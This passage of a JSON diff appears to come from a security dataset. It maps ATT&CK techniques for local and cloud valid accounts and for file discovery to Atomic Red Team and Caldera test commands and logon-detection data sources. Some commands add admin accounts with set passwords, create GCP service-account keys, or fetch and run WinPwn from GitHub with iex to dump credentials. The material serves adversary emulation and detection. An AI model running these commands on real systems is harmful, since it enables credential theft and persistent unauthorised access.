"Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1078.003", + "command_list": [ + "net user art-test /add\nnet user art-test Password123!\nnet localgroup administrators art-test /add", + "dscl . -create /Users/AtomicUser\ndscl . -create /Users/AtomicUser UserShell /bin/bash\ndscl . -create /Users/AtomicUser RealName \"Atomic User\"\ndscl . -create /Users/AtomicUser UniqueID 503\ndscl . -create /Users/AtomicUser PrimaryGroupID 503\ndscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser\ndscl . -passwd /Users/AtomicUser mySecretPassword\ndscl . -append /Groups/admin GroupMembership AtomicUser", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nobfuskittiedump -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsafedump -consoleoutput -noninteractive" + ], + "commands": [ + { + "command": "net user art-test /add\nnet user art-test Password123!\nnet localgroup administrators art-test /add", + "source": "atomics/T1078.003/T1078.003.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Local Accounts" + }, + { + "command": "dscl . -create /Users/AtomicUser\ndscl . -create /Users/AtomicUser UserShell /bin/bash\ndscl . -create /Users/AtomicUser RealName \"Atomic User\"\ndscl . -create /Users/AtomicUser UniqueID 503\ndscl . -create /Users/AtomicUser PrimaryGroupID 503\ndscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser\ndscl . -passwd /Users/AtomicUser mySecretPassword\ndscl . -append /Groups/admin GroupMembership AtomicUser", + "source": "atomics/T1078.003/T1078.003.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Local Accounts" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nobfuskittiedump -consoleoutput -noninteractive", + "source": "atomics/T1078.003/T1078.003.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Local Accounts" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsafedump -consoleoutput -noninteractive", + "source": "atomics/T1078.003/T1078.003.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Local Accounts" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1078.003", + "display_name": "Valid Accounts: Local Accounts", + "atomic_tests": [ + { + "name": "Create local account with admin privileges", + "auto_generated_guid": "a524ce99-86de-4db6-b4f9-e08f35a47a15", + "description": "After execution the new account will be active and added to the Administrators group", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user art-test /add\nnet user art-test Password123!\nnet localgroup administrators art-test /add", + "cleanup_command": "net localgroup administrators art-test /delete >nul 2>&1\nnet user art-test /delete >nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create local account with admin privileges - MacOS", + "auto_generated_guid": "f1275566-1c26-4b66-83e3-7f9f7f964daa", + "description": "After execution the new account will be active and added to the Administrators group", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "dscl . -create /Users/AtomicUser\ndscl . -create /Users/AtomicUser UserShell /bin/bash\ndscl . -create /Users/AtomicUser RealName \"Atomic User\"\ndscl . -create /Users/AtomicUser UniqueID 503\ndscl . -create /Users/AtomicUser PrimaryGroupID 503\ndscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser\ndscl . -passwd /Users/AtomicUser mySecretPassword\ndscl . -append /Groups/admin GroupMembership AtomicUser", + "cleanup_command": "sudo dscl . -delete /Users/AtomicUser", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "WinPwn - Loot local Credentials - powerhell kittie", + "auto_generated_guid": "9e9fd066-453d-442f-88c1-ad7911d32912", + "description": "Loot local Credentials - powerhell kittie technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nobfuskittiedump -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - Safetykatz", + "auto_generated_guid": "e9fdb899-a980-4ba4-934b-486ad22e22f4", + "description": "Loot local Credentials - Safetykatz technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsafedump -consoleoutput -noninteractive", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1078.004", + "command_list": [ + "gcloud auth login --no-launch-browser\ngcloud config set project art-project-1\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create gcp-art-service-account-1\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com\n", + "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create gcp-art-service-account-1.json --iam-account=#{service-account-email}\n" + ], + "commands": [ + { + "command": "gcloud auth login --no-launch-browser\ngcloud config set project art-project-1\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "source": "atomics/T1078.004/T1078.004.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Cloud Accounts" + }, + { + "command": "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create gcp-art-service-account-1\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "source": "atomics/T1078.004/T1078.004.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Cloud Accounts" + }, + { + "command": "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com\n", + "source": "atomics/T1078.004/T1078.004.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Cloud Accounts" + }, + { + "command": "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create gcp-art-service-account-1.json --iam-account=#{service-account-email}\n", + "source": "atomics/T1078.004/T1078.004.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Cloud Accounts" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1078.004", + "display_name": "Valid Accounts: Cloud Accounts", + "atomic_tests": [ + { + "name": "Creating GCP Service Account and Service Account Key", + "auto_generated_guid": "9fdd83fd-bd53-46e5-a716-9dec89c8ae8e", + "description": "GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud.\n", + "supported_platforms": [ + "google-workspace", + "windows", + "linux", + "macos" + ], + "input_arguments": { + "project-id": { + "description": "ID of the project, you want to create service account as well as service account key for", + "type": "String", + "default": "art-project-1" + }, + "service-account-name": { + "description": "Name of the service account", + "type": "String", + "default": "gcp-art-service-account-1" + }, + "service-account-email": { + "description": "Email of the service account", + "type": "String", + "default": "gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com" + }, + "output-key-file": { + "description": "Email of the service account", + "type": "String", + "default": "gcp-art-service-account-1.json" + } + }, + "executor": { + "name": "gcloud", + "elevation_required": false, + "command": "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "cleanup_command": "gcloud iam service-accounts delete #{service-account-email} --quiet\n" + }, + "dependency_executor_name": "gcloud", + "dependencies": [ + { + "description": "Requires gcloud\n", + "prereq_command": "if [ -x \"$(command -v gcloud)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install\"\n" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1083", + "command_list": [ + "dir /s c:\\ >> %temp%\\download\ndir /s \"c:\\Documents and Settings\" >> %temp%\\download\ndir /s \"c:\\Program Files\\\" >> %temp%\\download\ndir \"%systemdrive%\\Users\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\Desktop\\*.*\" >> %temp%\\download\ntree /F >> %temp%\\download\n", + "ls -recurse\nget-childitem -recurse\ngci -recurse\n", + "ls -a >> /tmp/T1083.txt\nif [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > /tmp/T1083.txt; fi;\nfile */* *>> /tmp/T1083.txt\ncat /tmp/T1083.txt 2>/dev/null\nfind . -type f\nls -R | grep \":$\" | sed -e 's/:$//' -e 's/[^-][^\\/]*\\//--/g' -e 's/^/ /' -e 's/-/|/'\nlocate *\nwhich sh\n", + "cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/T1083.txt\nif [ -f /etc/mtab ]; then cat /etc/mtab >> /tmp/T1083.txt; fi;\nfind . -type f -iname *.pdf >> /tmp/T1083.txt\ncat /tmp/T1083.txt\nfind . -type f -name \".*\"\n", + "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\", \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt}\n}\ncat $env:temp\\T1083Test5.txt\n", + "Get-ChildItem -Path #{host.system.path}\n", + "ls\n", + "dir\n", + "pwd\n", + "find ~ -type f -name #{host.print.file} 2>/dev/null", + "powershell/collection/file_finder", + "powershell/collection/find_interesting_file", + "powershell/collection/get_indexed_item", + "powershell/situational_awareness/network/powerview/get_fileserver" + ], + "commands": [ + { + "command": "dir /s c:\\ >> %temp%\\download\ndir /s \"c:\\Documents and Settings\" >> %temp%\\download\ndir /s \"c:\\Program Files\\\" >> %temp%\\download\ndir \"%systemdrive%\\Users\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\Desktop\\*.*\" >> %temp%\\download\ntree /F >> %temp%\\download\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "ls -recurse\nget-childitem -recurse\ngci -recurse\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "ls -a >> /tmp/T1083.txt\nif [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > /tmp/T1083.txt; fi;\nfile */* *>> /tmp/T1083.txt\ncat /tmp/T1083.txt 2>/dev/null\nfind . -type f\nls -R | grep \":$\" | sed -e 's/:$//' -e 's/[^-][^\\/]*\\//--/g' -e 's/^/ /' -e 's/-/|/'\nlocate *\nwhich sh\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/T1083.txt\nif [ -f /etc/mtab ]; then cat /etc/mtab >> /tmp/T1083.txt; fi;\nfind . -type f -iname *.pdf >> /tmp/T1083.txt\ncat /tmp/T1083.txt\nfind . -type f -name \".*\"\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\", \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt}\n}\ncat $env:temp\\T1083Test5.txt\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "Get-ChildItem -Path #{host.system.path}\n", + "source": "data/abilities/discovery/1c353eb4-29ab-4dfe-88ed-f34f5a60848e.yml", + "name": "Find or discover files on the file system" + }, + { + "command": "ls\n", + "source": "data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml", + "name": "List contents of current directory" + }, + { + "command": "dir\n", + "source": "data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml", + "name": "List contents of current directory" + }, + { + "command": "pwd\n", + "source": "data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml", + "name": "Print the current working directory on the system" + }, + { + "command": "find ~ -type f 